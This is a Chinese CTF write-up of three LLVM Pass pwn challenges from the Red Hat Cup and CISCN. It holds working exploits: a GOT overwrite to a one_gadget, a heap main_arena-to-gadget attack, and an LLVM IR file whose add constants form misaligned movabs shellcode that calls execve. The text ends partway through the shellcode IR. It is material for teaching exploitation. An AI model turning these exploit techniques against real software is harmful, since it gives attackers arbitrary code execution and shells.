连续2年国赛出过llvm了,做一个简单的总结
安装环境的话主要是这2个
sudo apt install llvm
sudo apt install clang
# 在输入完sudo apt install llvm-时按下tab键查看有哪些版本可以获取llvmpass利用基本上如图所示,通过opt利用so文件对IR(exp.ll)进行优化的过程
详细原理不再赘述,文后会有几篇文章,接下来主要是分享几道例题
simpleVM(改got表为one)
题目来自2021红帽杯初赛
把VMPass.so放入IDA,找到runOnFunction,会检验函数名,为o0o0o0o0即可继续执行
接下来用while循环遍历o0o0o0o0函数的每一个basicblock,每个basicblock作为参数进函数vuln
然后又是while循环,遍历每一个basicblock,匹配指令名,分别进行不同的处理。
这道题主要利用点在每次比对结束都会执行一次free,而opt-8没开pie且got表可写,结合上边的赋值,可以考虑修改free_got为one_gadget。add功能可以REG1/2+任意值;load功能相当于store的逆向,可以把got表里的真实地址赋值给REG1/2
//libc 2.27-3ubuntu1.5
void store(int a);
void load(int a);
void add(int a, int b);
void o0o0o0o0()
{
add(1, 0x77e100);
load(1);
add(2, 0x729ec);
store(1);
}from pwn import *
p = process("./opt-8")
elf = ELF("./opt-8")
libc = ELF("./libc-2.27.so")
print hex(elf.got['free'])
print hex(libc.sym['free'])进行编译
clang -emit-llvm -S exp.c -o exp.ll进行优化
./opt-8 -load ./VMPass.so -VMPass ./exp.ll
这里说一下环境的问题,这里需要配置opt的libc环境到对应版本,建议的话,到对应版本的虚拟机去打,不同的版本你装的llvm版本可能不同,这道题我在ubuntu18下完成利用。
patchelf --set-rpath /home/ef4tless/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ opt-8SATool(堆mainarena改one)
题目来自ciscn2021年的国赛
先看函数叫啥名
同样的进runonfunction,这里对函数名的校验,这里是16进制比对,所以值为B4ckDo0r
先看save函数,中间有很多报错函数
从上往下看的话,这部分开始应该就是函数核心功能,malloc_0x18赋给ptr,这里的src和v84结合上边的函数推测应该是我们输入的第一个和第二个参数,往堆fd和bk位分别写入东西,然后是对写入内容的校验。
然后是takeaway,它主要判断了一个ptr是否存在然后if判断结束执行了一个free,v45 = v54 = ptr[2];
stealkey是把堆里的内容覆给一个变量
fakekey则是把变量里的值加一个输入数,赋值给ptr,相当于add
run执行ptr的内容
涉及到堆,需要进行一个调试
根据上边的分析写一个exp框架
#include <stdio.h>
int run(){return 0;};
int save(char *a1,char *a2){return 0;};
int fakekey(int64){return 0;};
int takeaway(char *a1){return 0;};
int B4ckDo0r()
{
save("aaaa","aaaa");
}clang -emit-llvm -S exp.c -o exp.ll
gdb opt
b llvm::Pass::preparePassManager
run -load ./SAPass.so -SAPass ./exp.ll > /dev/null
然后在SAPass.so上下断点我们断点打在save赋值完成后,也可以通过这种方式验证我们对程序的分析是否准确
这道题tcache里还有6个堆,我们再用save申请掉剩下的,再申请就会切割unsortbin,fd和bk就会被写上mainarena,再利用add功能,加上偏移为gadget,然后利用执行功能就能getshell了
//GLIBC 2.27-3ubuntu1.5
#include <stdio.h>
int run(){return 0;};
int save(char *a1,char *a2){return 0;};
int fakekey(int64){return 0;};
int takeaway(char *a1){return 0;};
int stealkey(){return 0;};
int B4ckDo0r()
{
save("e4l4","e4l4");
save("e4l4","e4l4");
save("e4l4","e4l4");
save("e4l4","e4l4");
save("e4l4","e4l4");
save("e4l4","e4l4");
save("e4l4","e4l4");
save("\x00","e4l4");
stealkey();
fakekey(-0x2E19b4);
run();
}
satool(直接写exp.ll)
题目来自ciscn2022初赛
# 调试
clang -emit-llvm -S exp.c -o exp.ll
gdb opt-12
b llvm::Pass::preparePassManager
run -load ./mbaPass.so -mba ./exp.ll
b *0x7ffff2229000+0xF750题目没有给opt,但是readme.txt提到了用opt-12,给到了一个优化示例
应该是想告诉我们这个优化的作用,似乎是对加法的一种优化。然后就IDA找runonfunction,对参数的一些判断
这题的核心主要是这个部分,3是可读可写,5是可读可执行
handle函数对参数进行了一些操作,this4为头指针,end为尾指针,this5为当前指针。这里还保留了一些函数名,主要执行writeMovImm64和writeRet
writeMovImm64就是往this+5写东西,内容为[参数+bb48],然后(this+5)+A
48bb1122334455667788是movabs rbx, 0x8877665544332211的字节码
+10正好是movabs rbx, 0x8877665544332211 的长度
writeRet也是往this+5写东西c3就是ret
综上,这里就是一个合成shellcode片段的地方,合成一条条的movabs
然后执行的callcode部分,直接执行this4的位置(即movabs指令)
漏洞点在于边界,handle对参数处理的范围只到+0xff0,这里存在一个shellcode的偏差
比如这样一段shellcode
如果我们+2(0x7ffff7ffb018)此时我们输入的参数就会成为一段汇编
也就是说我们能在参数位置布置shellcode,比如jmp 7(“\xeb\x05”)
这里怎样才能制造这种偏差呢?就利用它超出边界的部分会被保留,边界内会被覆盖新的shellcode来实现切割shellcode
第一步:我们在将最后一组movabs的起始点放在+0xfee处这样+0xff0就是我们布置的shellcode(9090ebb2==nopnopjmp)
第二步:再起一个函数块,这次我们读入内容填充至+0xff2,这样就能正常执行到jmp指令。同样jmp以后我们还要利用这样+2的方式在jmp目标地址伪造好shellcode,由于我们一组读入的参数有限(6个字节)就需要多次jmp来执行syscall(59)
shellcode如下
这里还有个点就是短jmp(E8)的机器码,直接用网站生成即可jmp -76
jmp 0x7ffff7ffbfa6 是用的ebb2 == jmp 0xffffffffffffffb4(负跳转) 即-76
exp做了一些批注,利用时删除批注
define dso_local i64 @foo(i64 %0) local_unnamed_addr #0 {
%2 = add nsw i64 %0, 3001782416
%3 = add nsw i64 %2, 20000000000000
%4 = add nsw i64 %3, 20000000000000
%5 = add nsw i64 %4, 20000000000000
%6 = add nsw i64 %5, 20000000000000
%7 = add nsw i64 %6, 20000000000000
%8 = add nsw i64 %7, 20000000000000
%9 = add nsw i64 %8, 20000000000000
%10 = add nsw i64 %9, 20000000000000
%11 = add nsw i64 %10, 20000000000000
%12 = add nsw i64 %11, 20000000000000
%13 = add nsw i64 %12, 20000000000000
%14 = add nsw i64 %13, 20000000000000
%15 = add nsw i64 %14, 20000000000000
%16 = add nsw i64 %15, 20000000000000
%17 = add nsw i64 %16, 20000000000000
%18 = add nsw i64 %17, 20000000000000
%19 = add nsw i64 %18, 20000000000000
%20 = add nsw i64 %19, 20000000000000
%21 = add nsw i64 %20, 20000000000000
%22 = add nsw i64 %21, 20000000000000
%23 = add nsw i64 %22, 20000000000000
%24 = add nsw i64 %23, 20000000000000
%25 = add nsw i64 %24, 20000000000000
%26 = add nsw i64 %25, 20000000000000
%27 = add nsw i64 %26, 20000000000000
%28 = add nsw i64 %27, 20000000000000
%29 = add nsw i64 %28, 20000000000000
%30 = add nsw i64 %29, 20000000000000
%31 = add nsw i64 %30, 20000000000000
%32 = add nsw i64 %31, 20000000000000
%33 = add nsw i64 %32, 20000000000000
%34 = add nsw i64 %33, 20000000000000
%35 = add nsw i64 %34, 20000000000000
%36 = add nsw i64 %35, 20000000000000
%37 = add nsw i64 %36, 20000000000000
%38 = add nsw i64 %37, 20000000000000
%39 = add nsw i64 %38, 20000000000000
%40 = add nsw i64 %39, 20000000000000
%41 = add nsw i64 %40, 20000000000000
%42 = add nsw i64 %41, 20000000000000
%43 = add nsw i64 %42, 20000000000000
%44 = add nsw i64 %43, 20000000000000
%45 = add nsw i64 %44, 20000000000000
%46 = add nsw i64 %45, 20000000000000
%47 = add nsw i64 %46, 20000000000000
%48 = add nsw i64 %47, 20000000000000
%49 = add nsw i64 %48, 20000000000000
%50 = add nsw i64 %49, 20000000000000
%51 = add nsw i64 %50, 20000000000000
%52 = add nsw i64 %51, 20000000000000
%53 = add nsw i64 %52, 20000000000000
%54 = add nsw i64 %53, 20000000000000
%55 = add nsw i64 %54, 20000000000000
%56 = add nsw i64 %55, 20000000000000
%57 = add nsw i64 %56, 20000000000000
%58 = add nsw i64 %57, 20000000000000
%59 = add nsw i64 %58, 20000000000000
%60 = add nsw i64 %59, 20000000000000
%61 = add nsw i64 %60, 20000000000000
%62 = add nsw i64 %61, 20000000000000
%63 = add nsw i64 %62, 20000000000000
%64 = add nsw i64 %63, 20000000000000
%65 = add nsw i64 %64, 20000000000000
%66 = add nsw i64 %65, 20000000000000
%67 = add nsw i64 %66, 20000000000000
%68 = add nsw i64 %67, 20000000000000
%69 = add nsw i64 %68, 20000000000000
%70 = add nsw i64 %69, 20000000000000
%71 = add nsw i64 %70, 20000000000000
%72 = add nsw i64 %71, 20000000000000
%73 = add nsw i64 %72, 20000000000000
%74 = add nsw i64 %73, 20000000000000
%75 = add nsw i64 %74, 20000000000000
%76 = add nsw i64 %75, 20000000000000
%77 = add nsw i64 %76, 20000000000000
%78 = add nsw i64 %77, 20000000000000
%79 = add nsw i64 %78, 20000000000000
%80 = add nsw i64 %79, 20000000000000
%81 = add nsw i64 %80, 20000000000000
%82 = add nsw i64 %81, 20000000000000
%83 = add nsw i64 %82, 20000000000000
%84 = add nsw i64 %83, 20000000000000
%85 = add nsw i64 %84, 20000000000000
%86 = add nsw i64 %85, 20000000000000
%87 = add nsw i64 %86, 20000000000000
%88 = add nsw i64 %87, 20000000000000
%89 = add nsw i64 %88, 20000000000000
%90 = add nsw i64 %89, 20000000000000
%91 = add nsw i64 %90, 20000000000000
%92 = add nsw i64 %91, 20000000000000
%93 = add nsw i64 %92, 20000000000000
%94 = add nsw i64 %93, 20000000000000
%95 = add nsw i64 %94, 20000000000000
%96 = add nsw i64 %95, 20000000000000
%97 = add nsw i64 %96, 20000000000000
%98 = add nsw i64 %97, 20000000000000
%99 = add nsw i64 %98, 20000000000000
%100 = add nsw i64 %99, 20000000000000
%101 = add nsw i64 %100, 20000000000000
%102 = add nsw i64 %101, 20000000000000
%103 = add nsw i64 %102, 20000000000000
%104 = add nsw i64 %103, 20000000000000
%105 = add nsw i64 %104, 20000000000000
%106 = add nsw i64 %105, 20000000000000
%107 = add nsw i64 %106, 20000000000000
%108 = add nsw i64 %107, 20000000000000
%109 = add nsw i64 %108, 20000000000000
%110 = add nsw i64 %109, 20000000000000
%111 = add nsw i64 %110, 20000000000000
%112 = add nsw i64 %111, 20000000000000
%113 = add nsw i64 %112, 20000000000000
%114 = add nsw i64 %113, 20000000000000
%115 = add nsw i64 %114, 20000000000000
%116 = add nsw i64 %115, 20000000000000
%117 = add nsw i64 %116, 20000000000000
%118 = add nsw i64 %117, 20000000000000
%119 = add nsw i64 %118, 20000000000000
%120 = add nsw i64 %119, 20000000000000
%121 = add nsw i64 %120, 20000000000000
%122 = add nsw i64 %121, 20000000000000
%123 = add nsw i64 %122, 20000000000000
%124 = add nsw i64 %123, 20000000000000
%125 = add nsw i64 %124, 20000000000000
%126 = add nsw i64 %125, 20000000000000
%127 = add nsw i64 %126, 20000000000000
%128 = add nsw i64 %127, 20000000000000
%129 = add nsw i64 %128, 20000000000000
%130 = add nsw i64 %129, 20000000000000
%131 = add nsw i64 %130, 20000000000000
%132 = add nsw i64 %131, 20000000000000
%133 = add nsw i64 %132, 20000000000000
%134 = add nsw i64 %133, 20000000000000
%135 = add nsw i64 %134, 20000000000000
%136 = add nsw i64 %135, 20000000000000
%137 = add nsw i64 %136, 20000000000000
%138 = add nsw i64 %137, 20000000000000
%139 = add nsw i64 %138, 20000000000000
%140 = add nsw i64 %139, 20000000000000
%141 = add nsw i64 %140, 20000000000000
%142 = add nsw i64 %141, 20000000000000
%143 = add nsw i64 %142, 20000000000000
%144 = add nsw i64 %143, 20000000000000
%145 = add nsw i64 %144, 20000000000000
%146 = add nsw i64 %145, 20000000000000
%147 = add nsw i64 %146, 20000000000000
%148 = add nsw i64 %147, 20000000000000
%149 = add nsw i64 %148, 20000000000000
%150 = add nsw i64 %149, 20000000000000
%151 = add nsw i64 %150, 20000000000000
%152 = add nsw i64 %151, 20000000000000
%153 = add nsw i64 %152, 20000000000000
%154 = add nsw i64 %153, 20000000000000
%155 = add nsw i64 %154, 20000000000000
%156 = add nsw i64 %155, 20000000000000
%157 = add nsw i64 %156, 20000000000000
%158 = add nsw i64 %157, 20000000000000
%159 = add nsw i64 %158, 20000000000000
%160 = add nsw i64 %159, 20000000000000
%161 = add nsw i64 %160, 20000000000000
%162 = add nsw i64 %161, 20000000000000
%163 = add nsw i64 %162, 20000000000000
%164 = add nsw i64 %163, 20000000000000
%165 = add nsw i64 %164, 20000000000000
%166 = add nsw i64 %165, 20000000000000
%167 = add nsw i64 %166, 20000000000000
%168 = add nsw i64 %167, 20000000000000
%169 = add nsw i64 %168, 20000000000000
%170 = add nsw i64 %169, 20000000000000
%171 = add nsw i64 %170, 20000000000000
%172 = add nsw i64 %171, 20000000000000
%173 = add nsw i64 %172, 20000000000000
%174 = add nsw i64 %173, 20000000000000
%175 = add nsw i64 %174, 20000000000000
%176 = add nsw i64 %175, 20000000000000
%177 = add nsw i64 %176, 20000000000000
%178 = add nsw i64 %177, 20000000000000
%179 = add nsw i64 %178, 20000000000000
%180 = add nsw i64 %179, 20000000000000
%181 = add nsw i64 %180, 20000000000000
%182 = add nsw i64 %181, 20000000000000
%183 = add nsw i64 %182, 20000000000000
%184 = add nsw i64 %183, 20000000000000
%185 = add nsw i64 %184, 20000000000000
%186 = add nsw i64 %185, 20000000000000
%187 = add nsw i64 %186, 20000000000000
%188 = add nsw i64 %187, 20000000000000
%189 = add nsw i64 %188, 20000000000000
%190 = add nsw i64 %189, 20000000000000
%191 = add nsw i64 %190, 20000000000000
%192 = add nsw i64 %191, 20000000000000
%193 = add nsw i64 %192, 20000000000000
%194 = add nsw i64 %193, 20000000000000
%195 = add nsw i64 %194, 20000000000000
%196 = add nsw i64 %195, 20000000000000
%197 = add nsw i64 %196, 20000000000000
%198 = add nsw i64 %197, 20000000000000
%199 = add nsw i64 %198, 20000000000000
%200 = add nsw i64 %199, 20000000000000
%201 = add nsw i64 %200, 20000000000000
%202 = add nsw i64 %201, 20000000000000
%203 = add nsw i64 %202, 20000000000000
%204 = add nsw i64 %203, 20000000000000
%205 = add nsw i64 %204, 20000000000000
%206 = add nsw i64 %205, 20000000000000
%207 = add nsw i64 %206, 20000000000000
%208 = add nsw i64 %207, 20000000000000
%209 = add nsw i64 %208, 20000000000000
%210 = add nsw i64 %209, 20000000000000
%211 = add nsw i64 %210, 20000000000000
%212 = add nsw i64 %211, 20000000000000
%213 = add nsw i64 %212, 20000000000000
%214 = add nsw i64 %213, 20000000000000
%215 = add nsw i64 %214, 20000000000000
%216 = add nsw i64 %215, 20000000000000
%217 = add nsw i64 %216, 20000000000000
%218 = add nsw i64 %217, 20000000000000
%219 = add nsw i64 %218, 20000000000000
%220 = add nsw i64 %219, 20000000000000
%221 = add nsw i64 %220, 20000000000000
%222 = add nsw i64 %221, 20000000000000
%223 = add nsw i64 %222, 20000000000000
%224 = add nsw i64 %223, 20000000000000
%225 = add nsw i64 %224, 20000000000000
%226 = add nsw i64 %225, 20000000000000
%227 = add nsw i64 %226, 20000000000000
%228 = add nsw i64 %227, 20000000000000
%229 = add nsw i64 %228, 20000000000000
%230 = add nsw i64 %229, 20000000000000
%231 = add nsw i64 %230, 20000000000000
%232 = add nsw i64 %231, 20000000000000
%233 = add nsw i64 %232, 20000000000000
%234 = add nsw i64 %233, 20000000000000
%235 = add nsw i64 %234, 20000000000000
%236 = add nsw i64 %235, 20000000000000
%237 = add nsw i64 %236, 20000000000000
%238 = add nsw i64 %237, 20000000000000
%239 = add nsw i64 %238, 20000000000000
%240 = add nsw i64 %239, 20000000000000
%241 = add nsw i64 %240, 20000000000000
%242 = add nsw i64 %241, 20000000000000
%243 = add nsw i64 %242, 20000000000000
%244 = add nsw i64 %243, 20000000000000
%245 = add nsw i64 %244, 20000000000000
%246 = add nsw i64 %245, 20000000000000
%247 = add nsw i64 %246, 20000000000000
%248 = add nsw i64 %247, 20000000000000
%249 = add nsw i64 %248, 20000000000000
%250 = add nsw i64 %249, 20000000000000
%251 = add nsw i64 %250, 20000000000000
%252 = add nsw i64 %251, 20000000000000
%253 = add nsw i64 %252, 20000000000000
%254 = add nsw i64 %253, 20000000000000
%255 = add nsw i64 %254, 20000000000000
%256 = add nsw i64 %255, 20000000000000
%257 = add nsw i64 %256, 20000000000000
%258 = add nsw i64 %257, 20000000000000
%259 = add nsw i64 %258, 20000000000000
%260 = add nsw i64 %259, 20000000000000
%261 = add nsw i64 %260, 20000000000000
%262 = add nsw i64 %261, 20000000000000
%263 = add nsw i64 %262, 20000000000000
%264 = add nsw i64 %263, 20000000000000
%265 = add nsw i64 %264, 20000000000000
%266 = add nsw i64 %265, 20000000000000
%267 = add nsw i64 %266, 20000000000000
%268 = add nsw i64 %267, 20000000000000
%269 = add nsw i64 %268, 20000000000000
%270 = add nsw i64 %269, 20000000000000
%271 = add nsw i64 %270, 20000000000000
%272 = add nsw i64 %271, 20000000000000
%273 = add nsw i64 %272, 20000000000000
%274 = add nsw i64 %273, 20000000000000
%275 = add nsw i64 %274, 20000000000000
%276 = add nsw i64 %275, 20000000000000
%277 = add nsw i64 %276, 20000000000000
%278 = add nsw i64 %277, 20000000000000
%279 = add nsw i64 %278, 20000000000000
%280 = add nsw i64 %279, 20000000000000
%281 = add nsw i64 %280, 20000000000000
%282 = add nsw i64 %281, 20000000000000
%283 = add nsw i64 %282, 20000000000000
%284 = add nsw i64 %283, 20000000000000
%285 = add nsw i64 %284, 20000000000000
%286 = add nsw i64 %285, 20000000000000
%287 = add nsw i64 %286, 20000000000000
%288 = add nsw i64 %287, 20000000000000
%289 = add nsw i64 %288, 20000000000000
%290 = add nsw i64 %289, 20000000000000
%291 = add nsw i64 %290, 20000000000000
%292 = add nsw i64 %291, 20000000000000
%293 = add nsw i64 %292, 20000000000000
%294 = add nsw i64 %293, 20000000000000
%295 = add nsw i64 %294, 20000000000000
%296 = add nsw i64 %295, 20000000000000
%297 = add nsw i64 %296, 20000000000000
%298 = add nsw i64 %297, 20000000000000
%299 = add nsw i64 %298, 20000000000000
%300 = add nsw i64 %299, 20000000000000
%301 = add nsw i64 %300, 20000000000000
%302 = add nsw i64 %301, 20000000000000
%303 = add nsw i64 %302, 20000000000000
%304 = add nsw i64 %303, 20000000000000
%305 = add nsw i64 %304, 20000000000000
%306 = add nsw i64 %305, 20000000000000
%307 = add nsw i64 %306, 20000000000000
%308 = add nsw i64 %307, 20000000000000
%309 = add nsw i64 %308, 20000000000000
%310 = add nsw i64 %309, 20000000000000
%311 = add nsw i64 %310, 20000000000000
%312 = add nsw i64 %311, 20000000000000
%313 = add nsw i64 %312, 20000000000000
%314 = add nsw i64 %313, 20000000000000
%315 = add nsw i64 %314, 1
%316 = add nsw i64 %315, 1
%317 = add nsw i64 %316, 1
%318 = add nsw i64 %317, 1 //inc rax 3字节
ret i64 %318
}
define dso_local i64 @foo1(i64 %0) local_unnamed_addr #0 {
%2 = add nsw i64 %0, 21732277098 // 0x50f583b6a
%3 = add nsw i64 %2, 426533919260756112 // 0x5eb5a56f6314890
%4 = add nsw i64 %3, 426712264860536976 // 0x5ebfc8b48509090
%5 = add nsw i64 %4, 426555988614513992 // 0x5eb6e69622f0548
%6 = add nsw i64 %5, 426470739404150928 // 0x5EB20E0C1485890
%7 = add nsw i64 %6, 426435038325729424 // 0x6eb0068732f6890
%8 = add nsw i64 %7, 20000000000000
%9 = add nsw i64 %8, 20000000000000
%10 = add nsw i64 %9, 20000000000000
%11 = add nsw i64 %10, 20000000000000
%12 = add nsw i64 %11, 20000000000000
%13 = add nsw i64 %12, 20000000000000
%14 = add nsw i64 %13, 20000000000000
%15 = add nsw i64 %14, 20000000000000
%16 = add nsw i64 %15, 20000000000000
%17 = add nsw i64 %16, 20000000000000
%18 = add nsw i64 %17, 20000000000000
%19 = add nsw i64 %18, 20000000000000
%20 = add nsw i64 %19, 20000000000000
%21 = add nsw i64 %20, 20000000000000
%22 = add nsw i64 %21, 20000000000000
%23 = add nsw i64 %22, 20000000000000
%24 = add nsw i64 %23, 20000000000000
%25 = add nsw i64 %24, 20000000000000
%26 = add nsw i64 %25, 20000000000000
%27 = add nsw i64 %26, 20000000000000
%28 = add nsw i64 %27, 20000000000000
%29 = add nsw i64 %28, 20000000000000
%30 = add nsw i64 %29, 20000000000000
%31 = add nsw i64 %30, 20000000000000
%32 = add nsw i64 %31, 20000000000000
%33 = add nsw i64 %32, 20000000000000
%34 = add nsw i64 %33, 20000000000000
%35 = add nsw i64 %34, 20000000000000
%36 = add nsw i64 %35, 20000000000000
%37 = add nsw i64 %36, 20000000000000
%38 = add nsw i64 %37, 20000000000000
%39 = add nsw i64 %38, 20000000000000
%40 = add nsw i64 %39, 20000000000000
%41 = add nsw i64 %40, 20000000000000
%42 = add nsw i64 %41, 20000000000000
%43 = add nsw i64 %42, 20000000000000
%44 = add nsw i64 %43, 20000000000000
%45 = add nsw i64 %44, 20000000000000
%46 = add nsw i64 %45, 20000000000000
%47 = add nsw i64 %46, 20000000000000
%48 = add nsw i64 %47, 20000000000000
%49 = add nsw i64 %48, 20000000000000
%50 = add nsw i64 %49, 20000000000000
%51 = add nsw i64 %50, 20000000000000
%52 = add nsw i64 %51, 20000000000000
%53 = add nsw i64 %52, 20000000000000
%54 = add nsw i64 %53, 20000000000000
%55 = add nsw i64 %54, 20000000000000
%56 = add nsw i64 %55, 20000000000000
%57 = add nsw i64 %56, 20000000000000
%58 = add nsw i64 %57, 20000000000000
%59 = add nsw i64 %58, 20000000000000
%60 = add nsw i64 %59, 20000000000000
%61 = add nsw i64 %60, 20000000000000
%62 = add nsw i64 %61, 20000000000000
%63 = add nsw i64 %62, 20000000000000
%64 = add nsw i64 %63, 20000000000000
%65 = add nsw i64 %64, 20000000000000
%66 = add nsw i64 %65, 20000000000000
%67 = add nsw i64 %66, 20000000000000
%68 = add nsw i64 %67, 20000000000000
%69 = add nsw i64 %68, 20000000000000
%70 = add nsw i64 %69, 20000000000000
%71 = add nsw i64 %70, 20000000000000
%72 = add nsw i64 %71, 20000000000000
%73 = add nsw i64 %72, 20000000000000
%74 = add nsw i64 %73, 20000000000000
%75 = add nsw i64 %74, 20000000000000
%76 = add nsw i64 %75, 20000000000000
%77 = add nsw i64 %76, 20000000000000
%78 = add nsw i64 %77, 20000000000000
%79 = add nsw i64 %78, 20000000000000
%80 = add nsw i64 %79, 20000000000000
%81 = add nsw i64 %80, 20000000000000
%82 = add nsw i64 %81, 20000000000000
%83 = add nsw i64 %82, 20000000000000
%84 = add nsw i64 %83, 20000000000000
%85 = add nsw i64 %84, 20000000000000
%86 = add nsw i64 %85, 20000000000000
%87 = add nsw i64 %86, 20000000000000
%88 = add nsw i64 %87, 20000000000000
%89 = add nsw i64 %88, 20000000000000
%90 = add nsw i64 %89, 20000000000000
%91 = add nsw i64 %90, 20000000000000
%92 = add nsw i64 %91, 20000000000000
%93 = add nsw i64 %92, 20000000000000
%94 = add nsw i64 %93, 20000000000000
%95 = add nsw i64 %94, 20000000000000
%96 = add nsw i64 %95, 20000000000000
%97 = add nsw i64 %96, 20000000000000
%98 = add nsw i64 %97, 20000000000000
%99 = add nsw i64 %98, 20000000000000
%100 = add nsw i64 %99, 20000000000000
%101 = add nsw i64 %100, 20000000000000
%102 = add nsw i64 %101, 20000000000000
%103 = add nsw i64 %102, 20000000000000
%104 = add nsw i64 %103, 20000000000000
%105 = add nsw i64 %104, 20000000000000
%106 = add nsw i64 %105, 20000000000000
%107 = add nsw i64 %106, 20000000000000
%108 = add nsw i64 %107, 20000000000000
%109 = add nsw i64 %108, 20000000000000
%110 = add nsw i64 %109, 20000000000000
%111 = add nsw i64 %110, 20000000000000
%112 = add nsw i64 %111, 20000000000000
%113 = add nsw i64 %112, 20000000000000
%114 = add nsw i64 %113, 20000000000000
%115 = add nsw i64 %114, 20000000000000
%116 = add nsw i64 %115, 20000000000000
%117 = add nsw i64 %116, 20000000000000
%118 = add nsw i64 %117, 20000000000000
%119 = add nsw i64 %118, 20000000000000
%120 = add nsw i64 %119, 20000000000000
%121 = add nsw i64 %120, 20000000000000
%122 = add nsw i64 %121, 20000000000000
%123 = add nsw i64 %122, 20000000000000
%124 = add nsw i64 %123, 20000000000000
%125 = add nsw i64 %124, 20000000000000
%126 = add nsw i64 %125, 20000000000000
%127 = add nsw i64 %126, 20000000000000
%128 = add nsw i64 %127, 20000000000000
%129 = add nsw i64 %128, 20000000000000
%130 = add nsw i64 %129, 20000000000000
%131 = add nsw i64 %130, 20000000000000
%132 = add nsw i64 %131, 20000000000000
%133 = add nsw i64 %132, 20000000000000
%134 = add nsw i64 %133, 20000000000000
%135 = add nsw i64 %134, 20000000000000
%136 = add nsw i64 %135, 20000000000000
%137 = add nsw i64 %136, 20000000000000
%138 = add nsw i64 %137, 20000000000000
%139 = add nsw i64 %138, 20000000000000
%140 = add nsw i64 %139, 20000000000000
%141 = add nsw i64 %140, 20000000000000
%142 = add nsw i64 %141, 20000000000000
%143 = add nsw i64 %142, 20000000000000
%144 = add nsw i64 %143, 20000000000000
%145 = add nsw i64 %144, 20000000000000
%146 = add nsw i64 %145, 20000000000000
%147 = add nsw i64 %146, 20000000000000
%148 = add nsw i64 %147, 20000000000000
%149 = add nsw i64 %148, 20000000000000
%150 = add nsw i64 %149, 20000000000000
%151 = add nsw i64 %150, 20000000000000
%152 = add nsw i64 %151, 20000000000000
%153 = add nsw i64 %152, 20000000000000
%154 = add nsw i64 %153, 20000000000000
%155 = add nsw i64 %154, 20000000000000
%156 = add nsw i64 %155, 20000000000000
%157 = add nsw i64 %156, 20000000000000
%158 = add nsw i64 %157, 20000000000000
%159 = add nsw i64 %158, 20000000000000
%160 = add nsw i64 %159, 20000000000000
%161 = add nsw i64 %160, 20000000000000
%162 = add nsw i64 %161, 20000000000000
%163 = add nsw i64 %162, 20000000000000
%164 = add nsw i64 %163, 20000000000000
%165 = add nsw i64 %164, 20000000000000
%166 = add nsw i64 %165, 20000000000000
%167 = add nsw i64 %166, 20000000000000
%168 = add nsw i64 %167, 20000000000000
%169 = add nsw i64 %168, 20000000000000
%170 = add nsw i64 %169, 20000000000000
%171 = add nsw i64 %170, 20000000000000
%172 = add nsw i64 %171, 20000000000000
%173 = add nsw i64 %172, 20000000000000
%174 = add nsw i64 %173, 20000000000000
%175 = add nsw i64 %174, 20000000000000
%176 = add nsw i64 %175, 20000000000000
%177 = add nsw i64 %176, 20000000000000
%178 = add nsw i64 %177, 20000000000000
%179 = add nsw i64 %178, 20000000000000
%180 = add nsw i64 %179, 20000000000000
%181 = add nsw i64 %180, 20000000000000
%182 = add nsw i64 %181, 20000000000000
%183 = add nsw i64 %182, 20000000000000
%184 = add nsw i64 %183, 20000000000000
%185 = add nsw i64 %184, 20000000000000
%186 = add nsw i64 %185, 20000000000000
%187 = add nsw i64 %186, 20000000000000
%188 = add nsw i64 %187, 20000000000000
%189 = add nsw i64 %188, 20000000000000
%190 = add nsw i64 %189, 20000000000000
%191 = add nsw i64 %190, 20000000000000
%192 = add nsw i64 %191, 20000000000000
%193 = add nsw i64 %192, 20000000000000
%194 = add nsw i64 %193, 20000000000000
%195 = add nsw i64 %194, 20000000000000
%196 = add nsw i64 %195, 20000000000000
%197 = add nsw i64 %196, 20000000000000
%198 = add nsw i64 %197, 20000000000000
%199 = add nsw i64 %198, 20000000000000
%200 = add nsw i64 %199, 20000000000000
%201 = add nsw i64 %200, 20000000000000
%202 = add nsw i64 %201, 20000000000000
%203 = add nsw i64 %202, 20000000000000
%204 = add nsw i64 %203, 20000000000000
%205 = add nsw i64 %204, 20000000000000
%206 = add nsw i64 %205, 20000000000000
%207 = add nsw i64 %206, 20000000000000
%208 = add nsw i64 %207, 20000000000000
%209 = add nsw i64 %208, 20000000000000
%210 = add nsw i64 %209, 20000000000000
%211 = add nsw i64 %210, 20000000000000
%212 = add nsw i64 %211, 20000000000000
%213 = add nsw i64 %212, 20000000000000
%214 = add nsw i64 %213, 20000000000000
%215 = add nsw i64 %214, 20000000000000
%216 = add nsw i64 %215, 20000000000000
%217 = add nsw i64 %216, 20000000000000
%218 = add nsw i64 %217, 20000000000000
%219 = add nsw i64 %218, 20000000000000
%220 = add nsw i64 %219, 20000000000000
%221 = add nsw i64 %220, 20000000000000
%222 = add nsw i64 %221, 20000000000000
%223 = add nsw i64 %222, 20000000000000
%224 = add nsw i64 %223, 20000000000000
%225 = add nsw i64 %224, 20000000000000
%226 = add nsw i64 %225, 20000000000000
%227 = add nsw i64 %226, 20000000000000
%228 = add nsw i64 %227, 20000000000000
%229 = add nsw i64 %228, 20000000000000
%230 = add nsw i64 %229, 20000000000000
%231 = add nsw i64 %230, 20000000000000
%232 = add nsw i64 %231, 20000000000000
%233 = add nsw i64 %232, 20000000000000
%234 = add nsw i64 %233, 20000000000000
%235 = add nsw i64 %234, 20000000000000
%236 = add nsw i64 %235, 20000000000000
%237 = add nsw i64 %236, 20000000000000
%238 = add nsw i64 %237, 20000000000000
%239 = add nsw i64 %238, 20000000000000
%240 = add nsw i64 %239, 20000000000000
%241 = add nsw i64 %240, 20000000000000
%242 = add nsw i64 %241, 20000000000000
%243 = add nsw i64 %242, 20000000000000
%244 = add nsw i64 %243, 20000000000000
%245 = add nsw i64 %244, 20000000000000
%246 = add nsw i64 %245, 20000000000000
%247 = add nsw i64 %246, 20000000000000
%248 = add nsw i64 %247, 20000000000000
%249 = add nsw i64 %248, 20000000000000
%250 = add nsw i64 %249, 20000000000000
%251 = add nsw i64 %250, 20000000000000
%252 = add nsw i64 %251, 20000000000000
%253 = add nsw i64 %252, 20000000000000
%254 = add nsw i64 %253, 20000000000000
%255 = add nsw i64 %254, 20000000000000
%256 = add nsw i64 %255, 20000000000000
%257 = add nsw i64 %256, 20000000000000
%258 = add nsw i64 %257, 20000000000000
%259 = add nsw i64 %258, 20000000000000
%260 = add nsw i64 %259, 20000000000000
%261 = add nsw i64 %260, 20000000000000
%262 = add nsw i64 %261, 20000000000000
%263 = add nsw i64 %262, 20000000000000
%264 = add nsw i64 %263, 20000000000000
